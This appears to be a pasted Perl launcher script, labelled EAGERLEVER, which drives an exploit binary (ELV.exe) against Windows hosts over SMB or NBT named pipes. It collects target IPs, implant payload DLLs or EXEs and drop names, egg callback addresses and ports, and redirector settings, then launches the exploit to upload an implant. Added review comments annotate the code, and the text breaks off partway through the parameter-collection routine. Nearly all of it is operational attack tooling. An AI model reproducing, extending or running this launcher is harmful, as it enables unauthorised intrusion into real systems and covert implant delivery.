
exploit

a guest
May 19th, 2017
  1. use strict;
  2. use vars qw($VERSION);
  3.  
# Version banner. It is printed here, before any option parsing, and written
# to the log file again once logging has been initialised further down.
$::VERSION = "EAGERLEVER Script: 2.1.3";
print "\n\n$::VERSION\n\n";
  6.  
  7.  
  8.  
  9. use FindBin;
  10. use lib "$FindBin::Bin";
  11. use Getopt::Long;
  12. use Cwd;
  13.  
  14. use lib "$FindBin::Bin\\..\\..\\Resources\\Perl";
  15. use ExploitUtils qw(
  16. $EU_LOGFILE
  17. $EU_VERBOSE
  18. $EU_BATCHMODE
  19. EU_LogInit
  20. EU_Log
  21. EU_ExitMessage
  22. EU_GetInput
  23. EU_GetExistingDir
  24. EU_GetIP
  25. EU_GetLocalIP
  26. EU_GetRootDir
  27. EU_GetPort
  28. EU_RunCommand
  29. EU_GetAddr
  30. );
  31.  
  32.  
  33. use vars qw($RIDEAREA $PAYLOAD_DLL $PAYLOAD_EXE $EXPLOIT_EXE @DEPFILES);
  34.  
# Main flow of the launcher: parse options, resolve the working and root
# directories, start logging, collect the run parameters interactively
# (validate_parms), optionally pre-process the payload with the external
# RideArea tool, then start the ELV binary in a separate console window.
my %opts = ();
# NOTE(review): print_script_usage is not defined in the visible part of this
# file (only print_usage is) -- confirm it exists, otherwise a rejected option
# ends in an "Undefined subroutine" error instead of a usage message.
GetOptions(\%opts, "v", "h", "q|?", "b", "e=s", "f=s", "d=s", "t=s", "l=s", "c=s", "x=s", "n=s") or &print_script_usage(0);

# Positional arguments are not used; they are reported and discarded.
if (scalar(@ARGV) > 0 ) {
    &EU_Log(1, "Extraneous arguments found on command line: @ARGV");
    &EU_Log(1, "Arguments will be ingnored");
    while(@ARGV) {shift;}
}

# -e, -f, -x, -l and -n are all mandatory here, although the usage text shows
# them in brackets as if they were optional.
# NOTE(review): these checks run before the -h / -? handling further down, so
# asking for help without the mandatory options reports a missing option first.
if (!defined($opts{"e"})) {
    &EU_Log(1, "A -e option must be supplied.");
    &print_usage(0);
}

if (!defined($opts{"f"})) {
    &EU_Log(1, "A -f option must be supplied.");
    &print_usage(0);
}

if (!defined($opts{"x"})) {
    &EU_Log(1, "A -x option must be supplied.");
    &print_usage(0);
}

if (!defined($opts{"l"})) {
    &EU_Log(1, "A -l option must be supplied.");
    &print_usage(0);
}

if (!defined($opts{"n"})) {
    &EU_Log(1, "A -n option must be supplied.");
    &print_usage(0);
}

# Path of the RideArea tool, relative to the root directory resolved below.
$::RIDEAREA = "Resources\\Tools\\ridearea2.exe";

# Option values copied into package globals. LP_DLL and PAYLOAD_EXE_NAME are
# not listed in "use vars"; they pass "use strict" only because they are
# written fully qualified ($::NAME).
$::LP_DLL = "$opts{l}";
$::PAYLOAD_DLL = "$opts{f}";
$::PAYLOAD_EXE = "$opts{x}";
$::PAYLOAD_EXE_NAME = "$opts{n}";
$::EXPLOIT_EXE = "$opts{e}\\ELV.exe";

# Symbolic names for the values passed to ELV.exe with -u (egg socket),
# -c (implant socket) and -r (run mode) on the command lines below.
$::EGG_SOCKET_NONE = "1";
$::EGG_SOCKET_NEW = "2";
$::EGG_SOCKET_REUSE = "3";

$::IMPLANT_SOCKET_NEW = "2";
$::IMPLANT_SOCKET_MAINTAIN = "3";

$::RUN_EXPLOIT = "1";
$::RUN_PROBE_1 = "2";

# NOTE(review): "my $x = ... if COND" is documented in perlsyn as having
# undefined behaviour; declare the variable first and assign conditionally.
my $work_dir = $opts{"d"} if (defined $opts{"d"});
my $root_dir = $opts{"c"} if (defined $opts{"c"});
my $TargetIpIn = $opts{"t"} if (defined $opts{"t"});

# Files handed to EU_GetRootDir together with the root directory.
@DEPFILES = ($::RIDEAREA, $::EXPLOIT_EXE);

# Name fragments for the script log and for the RideArea output file. Both
# end up in the working directory, which makes that directory the place where
# a record of each run accumulates.
my $logfile_prefix = "ELV_";
my $logfile_suffix = "_script.log";
my $filename_suffix = "_payload.bin";

# Initial values for everything validate_parms fills in.
my $TargetIp = $TargetIpIn;
my $TargetPort = 0;
my $ImplantSocketStatus= $::IMPLANT_SOCKET_NEW;
my $TimeOutValue = 0;

my $PayloadFile = "";
my $PayloadType = "";
my $PayloadDropName = "N/A";

my $EggSocketStatus = $::EGG_SOCKET_REUSE;
my $EggCallbackIp = "127.0.0.1";
my $EggCallbackPort = 0;

my $ExternalRideArea = 0;
my $RA_Payload = "N/A";

# Numeric codes passed to ELV.exe with -t (transport protocol).
my $TransProt_none =0;
my $TransProt_tcp =1;
my $TransProt_udp =2;
my $TargetTransportProtocol = $TransProt_none;
my $TransportProtocol = "undefined";

# Numeric codes passed to ELV.exe with -b (application protocol). Only the
# NA, nbt and smb values are assigned anywhere in the visible code.
my $AppProt_none = 0;
my $AppProt_NA = 1;
my $AppProt_nbt = 2;
my $AppProt_smb = 3;
my $AppProt_smtp = 4;
my $AppProt_pop = 5;
my $AppProt_http = 6;
my $AppProt_ftp = 7;
my $AppProt_telnet = 8;
my $AppProt_imap = 9;
my $TargetApplicationProtocol = $AppProt_none;
my $ApplicationProtocol = "undefined";

my $RpcConnection = "";

# None of the RPCTOUCHII_* constants is referenced in the visible part of the
# file -- presumably left over from a related script; TODO confirm.
my $RPCTOUCHII_RUN_GENERAL_PROBE = 1;
my $RPCTOUCHII_RUN_REGPROBE = 2;
my $RPCTOUCHII_RUN_XP_SP0_PROBE = 3;
my $RPCTOUCHII_RUN_RPC_INTERFACE_PORT = 4;
my $RPCTOUCHII_RUN_WINDOWS_2000_SP4_PROBE = 5;
my $RPCTOUCHII_RUN_KB823980_PROBE = 6;
my $RPCTOUCHII_RUN_KB824146_PROBE = 7;
my $RPCTOUCHII_RUN_WINDOWS_2003_PROBE = 8;

# Display strings for the probe result. $not is the "no usable result" value
# that run_elvtouch starts from and validate_parms compares against.
my $not = "NOT GOOD";
my $w9x = "Windows 9x";
my $nt4 = "Windows NT 4.0";
my $w2k = "Windows 2000";
my $w2ksp0123 = "Windows 2000 Service Pack 0, 1, 2, or 3";
my $w2ksp4 = "Windows 2000 Service Pack 4";
my $wxp = "Windows XP";
my $wxpsp0 = "Windows XP Service Pack 0";
my $wxpsp1 = "Windows XP Service Pack 1";
my $wxpsp2 = "Windows XP Service Pack 2";
my $w2kXp = "Windows 2000 XP" ;
my $wxp2003 = "Windows XP Server 2003" ;
my $ws2003 = "Windows Server 2003";
my $ws2003sp1 = "Windows Server 2003 Service Pack 1";

my $WindowsVersion = 0;
# $TargetIpIn is undef when -t was not given; the interpolation then yields an
# empty string.
my $TargetServerIp = "$TargetIpIn";

&print_usage(1) if (defined $opts{"h"});
&print_usage(0) if (defined $opts{"q"});

$ExploitUtils::EU_VERBOSE = 1 if (defined $opts{"v"});
$ExploitUtils::EU_BATCHMODE = 1 if (defined $opts{"b"});

# Platform check: only the OS environment variable is consulted.
if ($ENV{"OS"} ne "Windows_NT") {
    &EU_ExitMessage(1,"This script requires Windows NT or Windows 2000");
}

$work_dir = &EU_GetExistingDir("Enter pathname for operation's working directory", $work_dir, 1);
$root_dir = &EU_GetRootDir($root_dir,@::DEPFILES);

# From here on EU_Log has a log file in the working directory.
&EU_LogInit($logfile_prefix, $logfile_suffix, $work_dir);
&EU_Log(0,"$::VERSION");

&EU_Log(0,"\nChanging to working directory: $work_dir");
# NOTE(review): "||" binds tighter than the chdir list operator, so this
# parses as chdir($work_dir || ...) and a failed chdir is never reported.
# Use "chdir($work_dir) or ..." to get the intended check.
chdir $work_dir || &EU_ExitMessage(1,"Unable to change to working directory: $work_dir");

# All run parameters are gathered (and confirmed by the operator) in
# validate_parms; the returned list replaces the initial values above.
($TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName, $TimeOutValue,
 $TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
 $EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
 $WindowsVersion, $TargetServerIp) =
    &validate_parms($work_dir, $root_dir, $TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName,
                    $TimeOutValue, $TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
                    $EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
                    $WindowsVersion, $TargetServerIp);

# Final go/no-go prompt; skipped entirely in batch mode (-b).
my $answer;
if(!$EU_BATCHMODE) {
    $answer = &EU_GetInput("\nReady to begin exploit ([y],n,quit)? ", "y");
    &EU_ExitMessage(0,"User terminated script") if ($answer ne "y" and $answer ne "Y");
}

# Optional pre-processing step: when the operator chose "script calls
# RideArea", the payload is run through ridearea2.exe and the result is
# written to <work_dir>\ELV_<UTC timestamp>_payload.bin.
if ($ExternalRideArea == 1) {

    my $payload_name_format = "${work_dir}\\${logfile_prefix}%04d%02d%02d_%02d%02d%02d${filename_suffix}";
    my ($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst) = gmtime(time);

    # gmtime returns years since 1900 and a zero-based month.
    $year += 1900;
    $mon += 1;

    $RA_Payload = sprintf($payload_name_format,$year,$mon,$mday,$hour,$min,$sec);

    # The eight command lines below differ in three things only:
    #   - "-f 17 -a 8" (socket maintained) versus "-f 13 -a 3" (new socket),
    #   - "-d <drop name>" present unless the drop name is "N/A",
    #   - a trailing "-l m" when the payload type is "d".
    # NOTE(review): if $ImplantSocketStatus holds neither value, no command is
    # run, yet $RA_Payload is still handed to the launch step further down.
    # NOTE(review): $PayloadType and $PayloadDropName are interpolated into
    # the command string without quoting. How EU_RunCommand executes the
    # string is not visible here; if it goes through a shell, a drop name
    # containing spaces or shell metacharacters changes the command.
    if( $ImplantSocketStatus eq $::IMPLANT_SOCKET_MAINTAIN ) {
        if ($PayloadDropName eq "N/A") {
            if ($PayloadType eq "d") {
                &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 17 -a 8 -t m -l m");
            }
            else {
                &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 17 -a 8 -t m");
            }
        }
        else {
            if ($PayloadType eq "d") {
                &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 17 -a 8 -t m -l m");
            }
            else {
                &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 17 -a 8 -t m");
            }
        }
    }
    elsif( $ImplantSocketStatus eq $::IMPLANT_SOCKET_NEW ) {
        if ($PayloadDropName eq "N/A") {
            if ($PayloadType eq "d") {
                &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 13 -a 3 -t m -l m");
            }
            else {
                &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 13 -a 3 -t m");
            }
        }
        else {
            if ($PayloadType eq "d") {
                &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 13 -a 3 -t m -l m");
            }
            else {
                &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 13 -a 3 -t m");
            }
        }
    }
}

# NOTE(review): $flags is computed but not used in any command line below.
my $flags;
if($ExploitUtils::EU_VERBOSE) { $flags = "-v"; }
else { $flags = ""; }

&EU_Log(1,"\nExploit will launch in a separate window. Follow the status messages");
&EU_Log(1,"in the new window to determine if it succeeds.");
&EU_Log(1,"\nLaunching exploit...");

# The file given to ELV.exe with -f: the RideArea output when the script ran
# RideArea itself, otherwise the payload file chosen by the operator.
my $ImplantPayload = "N/A";
if ($ExternalRideArea == 1) {
    $ImplantPayload = $RA_Payload;
}
else {
    $ImplantPayload = $PayloadFile;
}

# ELV.exe is started through "start ... cmd /K", i.e. in its own console
# window, so this script does not see its output or exit status. Every
# parameter (addresses, ports, payload path) is passed on the command line.
# The three variants differ only in "-z" (pre-processed payload) versus
# "-x <type>" and an optional "-q <drop name>".
if ($ExternalRideArea == 1) {
    &EU_RunCommand("start \"ELV Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" -r $::RUN_EXPLOIT -i $TargetIp -p $TargetPort -u $EggSocketStatus -c $ImplantSocketStatus -I $EggCallbackIp -P $EggCallbackPort -f \"$ImplantPayload\" -l \"$root_dir\\$::LP_DLL\" -z -o $TimeOutValue -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -w $WindowsVersion -h $TargetServerIp\"");
}
else {
    if ($PayloadDropName eq "N/A") {
        &EU_RunCommand("start \"ELV Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" -r $::RUN_EXPLOIT -i $TargetIp -p $TargetPort -u $EggSocketStatus -c $ImplantSocketStatus -I $EggCallbackIp -P $EggCallbackPort -f \"$ImplantPayload\" -x $PayloadType -l \"$root_dir\\$::LP_DLL\" -o $TimeOutValue -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -w $WindowsVersion -h $TargetServerIp\"");
    }
    else {
        &EU_RunCommand("start \"ELV Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" -r $::RUN_EXPLOIT -i $TargetIp -p $TargetPort -u $EggSocketStatus -c $ImplantSocketStatus -I $EggCallbackIp -P $EggCallbackPort -f \"$ImplantPayload\" -x $PayloadType -q $PayloadDropName -l \"$root_dir\\$::LP_DLL\" -o $TimeOutValue -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -w $WindowsVersion -h $TargetServerIp\"");
    }
}

# NOTE(review): cwd() is read here, after the chdir into the working
# directory, so this "switch back" changes to the directory the script is
# already in. The "||" precedence problem noted at the first chdir applies
# here as well.
my $cur_dir = cwd();
chdir $cur_dir || &EU_ExitMessage(1,"Unable to switch back to initial directory: $cur_dir");

&EU_ExitMessage(0,"\nDone with $::0.");
  305.  
  306.  
  307.  
  308. sub print_usage() {
  309. my ($verbose) = @_;
  310. print "$::VERSION\n";
  311.  
  312. print qq~
  313. Usage: $::0 [-v] [-h] [-?] [-b]
  314. [-d <working directory>] [-e <exploits directory>]
  315. [-t <target IP>] [-l <lp dll>]
  316. [-f <payload dll>]
  317. [-x <payload exe> [-n <Payload Dropname>]]
  318.  
  319. ~;
  320.  
  321. if ($verbose) {
  322. print qq~
  323.  
  324. -v verbose mode. Default non-verbose mode.
  325.  
  326. -h Print this help information.
  327.  
  328. -? Print abbreviated help information.
  329.  
  330. -b Batch (non-interactive) mode. Default interactive mode.
  331.  
  332. -d <working directory> Working Directory
  333. Top-level directory where operation's files will be
  334. generated. Default E:\.
  335.  
  336. -e <exploits directory> Exploits Directory
  337. Top-level directory containing exploit files.
  338. Default one directory up from directory containing this script.
  339.  
  340. -t <target IP> Target IP address.
  341. Default derived as last part of working directory name.
  342.  
  343. -l <lp dll> Filename of the listening post dll.
  344.  
  345. -f <payload dll> Filename of the implant payload (dll).
  346.  
  347. -x <payload exe> Filename of the implant payload (exe).
  348.  
  349. -n <payload dropname> Filename to be used for the dropped executable
  350.  
  351. ~;
  352. }
  353.  
  354. &EU_ExitMessage(1,"End of help.");
  355. }
  356.  
  357.  
# Interactive parameter collection. Prompts the operator (through the
# EU_Get* helpers) for payload, RideArea mode, transport, redirection,
# socket options, timeout and target OS, shows the result for confirmation,
# and repeats the whole dialogue until the operator accepts it or quits.
#
# Arguments: the 18 values passed by the main script, used as initial
# values and defaults. $work_dir is accepted but not used in the body.
# Returns:   a 16-element list in the order of the "return" statement at the
#            end (the same order the caller assigns from).
#
# Every prompt is followed by an EU_Log call that records the prompt text and
# the answer. The first argument of EU_Log is 0 for those records and 1 for
# messages meant for the operator -- presumably 0 = log file only and
# 1 = also shown on the console; confirm in ExploitUtils.
#
# Side effect: the file-scoped lexicals $TransportProtocol and
# $ApplicationProtocol are assigned here as display strings.
sub validate_parms() {
    my ($work_dir, $root_dir, $TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName,
        $TimeOutValue,$TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
        $EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
        $WindowsVersion, $TargetServerIp) = @_;

    # $vol and $dir are declared but never used in this sub.
    my ($continue, $retcode, $vol, $dir);
    my ($redirectFlag);
    my $OrgTargetIp = $TargetIp;
    my $LPRedirectionIp = "127.0.0.1";
    my $LPRedirectionPort = "undefined";
    my $DestinationIp = $TargetIp;
    my $DestinationPort = "undefined";
    my $TransportProtocolSelected = 0;
    my $RideAreaOpt = "Exploit called";

    my ($LocalIp);

    my $RpcTouchProtocol = "undefined";

    # $LocalIp is still undef here, so no default is offered to the helper.
    $LocalIp = &EU_GetLocalIP("Enter the local IP Address", $LocalIp);
    &EU_Log(0, "Enter the local IP Address: $LocalIp");

    # Outer dialogue loop: "next" restarts from the payload menu, the only
    # "last" is at the final confirmation.
    while (1) {

        # --- Payload selection: DLL (type "d") or EXE (type "e") ---
        &EU_Log(1,"\nSelect Payload file to send:\n");
        &EU_Log(1," 0) $::PAYLOAD_DLL");
        &EU_Log(1," 1) $::PAYLOAD_EXE ($::PAYLOAD_EXE_NAME)");
        while(1) {
            $retcode = &EU_GetInput("\nEnter selection [0]: ", "0");
            &EU_Log(0, "\nEnter selection [0]: $retcode");

            if($retcode eq "0") {
                &EU_Log(1,"\nUsing Payload file $::PAYLOAD_DLL\n");
                $PayloadFile = $::PAYLOAD_DLL;
                $PayloadType = "d";
                $PayloadDropName = "N/A";
            }
            elsif($retcode eq "1") {
                &EU_Log(1,"\nUsing Payload file $::PAYLOAD_EXE\n");
                $PayloadFile = $::PAYLOAD_EXE;
                $PayloadType = "e";
                $PayloadDropName = $::PAYLOAD_EXE_NAME;
            }
            else {
                &EU_Log(1, "Invalid option. Try again or enter 'quit'.");
                next;
            }
            last;
        }

        # --- Who runs RideArea: the exploit binary (0) or this script (1) ---
        # The default offered is the value passed in by the caller.
        &EU_Log(1,"\nRideArea option:\n");
        &EU_Log(1," 0) Have exploit call RideArea [DEFAULT]");
        &EU_Log(1," 1) Have the script call RideArea. (RideArea is newer than the exploit)");
        while(1) {
            $ExternalRideArea = &EU_GetInput("\nEnter selection [0]: ", $ExternalRideArea);
            &EU_Log(0, "\nEnter selection [0]: $ExternalRideArea");

            if($ExternalRideArea eq "0") {
                $RideAreaOpt = "Exploit called";
            }
            elsif($ExternalRideArea eq "1") {
                $RideAreaOpt = "Script called";
            }
            else {
                &EU_Log(1, "Invalid option. Try again or enter 'quit'.");
                next;
            }
            last;
        }

        # --- Transport: named pipe over NBT (TCP 139) or SMB (TCP 445) ---
        # NOTE(review): the menu lists only 1 and 2, but the code also
        # accepts "3" (UDP, port 135), which the menu does not mention.
        &EU_Log(1,"\nSelect the Transport Protocol Sequence To Use:\n");
        &EU_Log(1," 1) NBT/Named Pipe (TCP Port 139 is accessible)");
        &EU_Log(1," 2) SMB/Named Pipe (TCP Port 445 is accessible)");
        while(1) {
            $TransportProtocolSelected = &EU_GetInput("\nEnter selection [2]: ", "2");
            &EU_Log(0, "\nEnter selection [2]: $TransportProtocolSelected");
            if ($TransportProtocolSelected eq "1") {
                $TargetTransportProtocol = $TransProt_tcp;
                $TransportProtocol = "tcp";
                $TargetApplicationProtocol = $AppProt_nbt;
                $ApplicationProtocol = "nbt";
                $RpcConnection = "-rpc";
                $RpcTouchProtocol = "rpc_nbt";
                $DestinationPort = 139;
            }
            elsif($TransportProtocolSelected eq "2") {
                $TargetTransportProtocol = $TransProt_tcp;
                $TransportProtocol = "tcp";
                $TargetApplicationProtocol = $AppProt_smb;
                $ApplicationProtocol = "smb";
                $RpcConnection = "-rpc";
                $RpcTouchProtocol = "rpc_smb";
                $DestinationPort = 445;
            }
            elsif($TransportProtocolSelected eq "3") {
                $TargetTransportProtocol = $TransProt_udp;
                $TransportProtocol = "udp";
                $TargetApplicationProtocol = $AppProt_NA;
                $ApplicationProtocol = "NA";
                $RpcConnection = "-rpc";
                $RpcTouchProtocol = "rpc_udp";
                $DestinationPort = 135;
            }
            else {
                &EU_Log(1, "Invalid option. Try again or enter 'quit'.");
                next;
            }
            last;
        }

        # --- Direct connection or connection through a redirector ---
        # Only y/yes/Y/YES select redirection; any other answer means "no".
        # This answer is not written to the log with EU_Log(0, ...).
        $retcode = &EU_GetInput("\nWill this operation be REDIRECTED ([y],n)? ", "y");

        if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") ) { $redirectFlag = 1; }
        else { $redirectFlag = 0; }

        if( $redirectFlag == 0 ) {

            # Direct case: the connection goes straight to the target
            # address and port, and the callback address is the local one.
            $EggCallbackIp = $LocalIp;
            $TargetIp = $OrgTargetIp;
            $TargetIp = &EU_GetIP("\nEnter the target IP Address", $TargetIp);
            &EU_Log(0, "Enter the target IP Address: $TargetIp");
            $DestinationIp = $TargetIp;

            $DestinationPort = &EU_GetPort("\nEnter the target Port", $DestinationPort);
            &EU_Log(0, "Enter the target Port: $DestinationPort");

            $TargetPort = $DestinationPort;
            $TargetServerIp = $TargetIp;

            ($ImplantSocketStatus, $EggSocketStatus) = &get_socket_options($ImplantSocketStatus, $EggSocketStatus, $PayloadType);

            if( $EggSocketStatus eq $::EGG_SOCKET_NEW) {

                &EU_Log(1, "\nThe ELV Exploit Payload must callback in order to upload the Implant Payload.");

                &EU_Log(1, "The local IP Address should be used as the Egg callback IP Address.");

                $EggCallbackIp = &EU_GetLocalIP("\nEnter the Egg callback IP Address", $LocalIp);
                &EU_Log(0, "Enter the Egg callback IP Address: $EggCallbackIp");

                # Suggested callback port is derived from the target port
                # (port * 10 + 1); "0" is the only value rejected here.
                $EggCallbackPort = $DestinationPort * 10 + 1;
                while(1) {
                    $EggCallbackPort = &EU_GetPort("\nEnter the Egg callback Port", $EggCallbackPort);
                    &EU_Log(0, "Enter the Egg callback Port: $EggCallbackPort");
                    if($EggCallbackPort eq "0") {
                        &EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
                        next;
                    }
                    last;
                }
            }

        }

        else {

            # Redirected case: the tool connects to the redirector address
            # and port; the real target address is collected separately and
            # returned as $TargetServerIp.
            $LPRedirectionIp = &EU_GetIP("\nEnter the LP Redirection IP address", $LPRedirectionIp);
            &EU_Log(0, "Enter the LP Redirection IP address: $LPRedirectionIp");
            $TargetIp = $LPRedirectionIp;

            # Suggested redirector port is the protocol's port * 10.
            # NOTE(review): for "rpc_udp" neither branch below runs, so the
            # suggested port is used without a prompt and $TargetServerIp
            # keeps the value passed in.
            $LPRedirectionPort = $DestinationPort * 10;
            if($RpcTouchProtocol eq "rpc_nbt") {
                &EU_Log(1, "\nELV must be directed to the Target on TCP Port 139.");
                $LPRedirectionPort = &EU_GetPort("Enter the LP Redirection Port No.", $LPRedirectionPort);
                &EU_Log(0,"Enter the LP Redirection Port No.: $LPRedirectionPort");

                $TargetServerIp = &EU_GetIP("\nEnter the NBT Server's IP address (AKA: the Actual Target's IP Address)", $DestinationIp);
                &EU_Log(0,"Enter the NBT Server's IP address: $TargetServerIp");
            }
            elsif($RpcTouchProtocol eq "rpc_smb") {
                &EU_Log(1, "\nELV must be directed to the Target on TCP Port 445.");
                $LPRedirectionPort = &EU_GetPort("Enter the LP Redirection Port No.", $LPRedirectionPort);
                &EU_Log(0,"Enter the LP Redirection Port No.: $LPRedirectionPort");

                $TargetServerIp = &EU_GetIP("\nEnter the SMB Server's IP address (AKA: the Actual Target's IP Address)", $DestinationIp);
                &EU_Log(0,"Enter the SMB Server's IP address: $TargetServerIp");
            }
            $TargetPort = $LPRedirectionPort;

            ($ImplantSocketStatus, $EggSocketStatus) = &get_socket_options($ImplantSocketStatus, $EggSocketStatus, $PayloadType);

            if( $EggSocketStatus eq $::EGG_SOCKET_NEW) {

                &EU_Log(1, "\n");
                &EU_Log(1, "*************************************************************************");
                &EU_Log(1, "* The ELV Exploit Payload must callback in order to upload the Implant *");
                &EU_Log(1, "* Payload. The callback IP Address MUST be that of the Middle *");
                &EU_Log(1, "* Redirector. The callback Port MUST be the same number on both the *");
                &EU_Log(1, "* Middle Redirector and the local machine, else redirection will fail. *");
                &EU_Log(1, "* The local machine uses this port to listen for the callback, and the *");
                &EU_Log(1, "* ELV Exploit Payload uses it to call back to the local machine *");
                &EU_Log(1, "* through the Redirector. *");
                &EU_Log(1, "*************************************************************************");

                $EggCallbackIp = &EU_GetLocalIP("\nEnter the Egg callback(Middle Redirector) IP ", $EggCallbackIp);
                &EU_Log(0, "Enter the Egg callback(Middle Redirector) IP Address: $EggCallbackIp");

                $EggCallbackPort = $DestinationPort * 10 + 1;
                while(1) {
                    $EggCallbackPort = &EU_GetPort("\nEnter the Egg callback Port", $EggCallbackPort);
                    &EU_Log(0, "Enter the Egg callback Port: $EggCallbackPort");
                    if($EggCallbackPort eq "0") {
                        &EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
                        next;
                    }
                    last;
                }
            }
        }

        # --- Connection timeout ---
        # NOTE(review): the replacement value is taken as typed; nothing
        # checks that it is numeric or greater than 60 as the prompt asks.
        &EU_Log(1, "\nThe default time-out value for the target connection is 60 sec.");
        &EU_Log(1, "(You may want to increase this value if the network is exceptionally slow.)");
        $retcode = &EU_GetInput("Use default value of 60 sec ([y],n)? ", "y");
        &EU_Log(0, "Use default value of 60 sec ([y],n)? $retcode");

        if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") or ($retcode eq "60") ) {
            $TimeOutValue = "60";
        }
        else {
            $TimeOutValue = &EU_GetInput("Enter new time-out value (greater than 60): ");
            &EU_Log(0, "Enter new time-out value (greater than 60): $TimeOutValue");
        }

        # --- First confirmation (before the optional probe) ---
        # The same summary is printed again after the probe, with the
        # Windows version added.
        &EU_Log(1,"\nConfirm Network Parameters:");
        &EU_Log(1,"\tRoot Directory : $root_dir");
        &EU_Log(1,"\tLocal IP : $LocalIp");
        &EU_Log(1,"\tPayload file : $PayloadFile");
        &EU_Log(1,"\tPayload drop name : $PayloadDropName");
        &EU_Log(1,"\tRideArea Option : $RideAreaOpt");
        if( $redirectFlag ) {
            &EU_Log(1,"\tUsing Redirection : True");
            &EU_Log(1,"\tLP Redirector IP : $LPRedirectionIp");
            &EU_Log(1,"\tLP Redirector Port : $LPRedirectionPort");
        }
        else {
            &EU_Log(1,"\tUsing Redirection : False");
        }
        &EU_Log(1,"\tTarget IP : $DestinationIp");
        &EU_Log(1,"\tTarget Port : $DestinationPort");

        if( $EggSocketStatus eq $::EGG_SOCKET_NEW ) {
            &EU_Log(1,"\tEgg Socket Status : New");
            if( $redirectFlag ) {
                &EU_Log(1,"\tEgg Callback IP : $EggCallbackIp (Middle Redirector)");
            }
            else {
                &EU_Log(1,"\tEgg Callback IP : $EggCallbackIp");
            }
            &EU_Log(1,"\tEgg Callback Port : $EggCallbackPort");
        }
        elsif( $EggSocketStatus eq $::EGG_SOCKET_REUSE ) {
            &EU_Log(1,"\tEgg Socket Status : Reuse");
        }
        else {
            &EU_Log(1,"\tEgg Socket Status : None");
        }

        if( $ImplantSocketStatus eq $::IMPLANT_SOCKET_MAINTAIN ) {
            &EU_Log(1,"\tExploit Socket Status : Maintain (Use existing connection for the entire operation.)");
        }
        else {
            &EU_Log(1,"\tExploit Socket Status : Close (Existing connection will NOT be used for the entire operation.)");
        }

        &EU_Log(1,"\tTransport Protocol : $TransportProtocol");
        &EU_Log(1,"\tApplication Protocol : $ApplicationProtocol");
        &EU_Log(1,"\tRpc Connection flag : $RpcConnection");

        &EU_Log(1,"\tNetwork Time Out : $TimeOutValue sec");

        $continue = &EU_GetInput("\nContinue with the current values ([y],n,quit)? ","y");
        &EU_Log(0, "\nContinue with the current values ([y],n,quit)? $continue");

        if( ($continue eq "y") or ($continue eq "yes") or ($continue eq "Y") or ($continue eq "YES") ) {
            # Accepted: fall through to the probe step.
            ;
        }
        elsif( ($continue eq "q") or ($continue eq "quit") or ($continue eq "Q") or ($continue eq "QUIT") ) {
            &EU_ExitMessage(1,"User terminated script\n");
        }
        else {
            &EU_Log(1, "Returning to top of script...\n");
            next;
        }

        # --- Optional probe ("touch") to identify the target's Windows version ---
        # run_elvtouch returns (version string, vulnerable flag, error flag).
        # NOTE(review): $touchFlag is set back to "n" in two branches below
        # but is not read again in this sub, so those assignments have no
        # visible effect; the probe's $WindowsVersion is kept either way.
        my $touchFlag = "n";
        $WindowsVersion = $not;

        $touchFlag = &EU_GetInput("\nUse ELV touch option to obtain the Windows Version ([y],n)? ", "y");

        if(($touchFlag eq "y") or ($touchFlag eq "Y") or ($touchFlag eq "yes") or ($touchFlag eq "YES")) {
            my $bVulnerable = 0;
            my $bError = 0;

            ($WindowsVersion, $bVulnerable, $bError) = &run_elvtouch($root_dir,$TargetIp,$TargetPort,$TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection, $TargetServerIp, $TimeOutValue,$::RUN_PROBE_1);

            # No usable version, not reported vulnerable, or probe error:
            # warn, and default the answer to "quit".
            if( ($WindowsVersion eq $not) or ($bVulnerable == 0) or ($bError == 1) ) {

                &EU_Log(1, "\n*** WARNING *** Recommend you STOP and re-evaluate before proceeding!");
                $continue = &EU_GetInput("\nDo you wish to continue (y,n,[quit])? ", "quit");
                &EU_Log(0, "\nDo you wish to continue (y,n,[quit])? $continue");

